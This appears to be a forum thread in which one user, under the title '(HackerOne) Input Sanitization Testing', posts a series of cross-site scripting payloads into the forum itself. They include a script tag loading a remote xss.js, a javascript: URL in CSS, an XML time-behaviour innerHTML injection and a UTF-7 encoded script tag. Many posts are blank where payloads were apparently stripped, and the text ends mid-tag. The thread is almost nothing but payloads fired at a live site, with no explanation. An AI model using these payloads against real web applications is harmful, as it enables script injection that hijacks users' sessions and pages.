(HackerOne) Input Sanitization Testing

HTTPMovedPermanently · December 18, 2020, 4:24pm

<SCRIPT/SRC=“http://xss.rocks/xss.js”></SCRIPT

HTTPMovedPermanently · December 18, 2020, 4:24pm

<

HTTPMovedPermanently · December 18, 2020, 4:25pm

HTTPMovedPermanently · December 18, 2020, 4:25pm

test

HTTPMovedPermanently · December 18, 2020, 4:25pm

HTTPMovedPermanently · December 18, 2020, 4:26pm

HTTPMovedPermanently · December 18, 2020, 4:26pm

HTTPMovedPermanently · December 18, 2020, 4:28pm

li {list-style-image: url("javascript:alert('XSS')");}

XSS

HTTPMovedPermanently · December 18, 2020, 4:28pm

HTTPMovedPermanently · December 18, 2020, 4:29pm

HTTPMovedPermanently · December 18, 2020, 4:29pm

HTTPMovedPermanently · December 18, 2020, 4:29pm

HTTPMovedPermanently · December 18, 2020, 4:29pm

HTTPMovedPermanently · December 18, 2020, 4:30pm

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")">

HTTPMovedPermanently · December 18, 2020, 4:30pm

<? echo('alert("XSS")'); ?>

HTTPMovedPermanently · December 18, 2020, 4:30pm

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

HTTPMovedPermanently · December 18, 2020, 4:31pm

HTTPMovedPermanently · December 18, 2020, 4:31pm

XSS

HTTPMovedPermanently · December 18, 2020, 4:32pm

HTTPMovedPermanently · December 18, 2020, 4:32pm

<a href="/share?content_type=1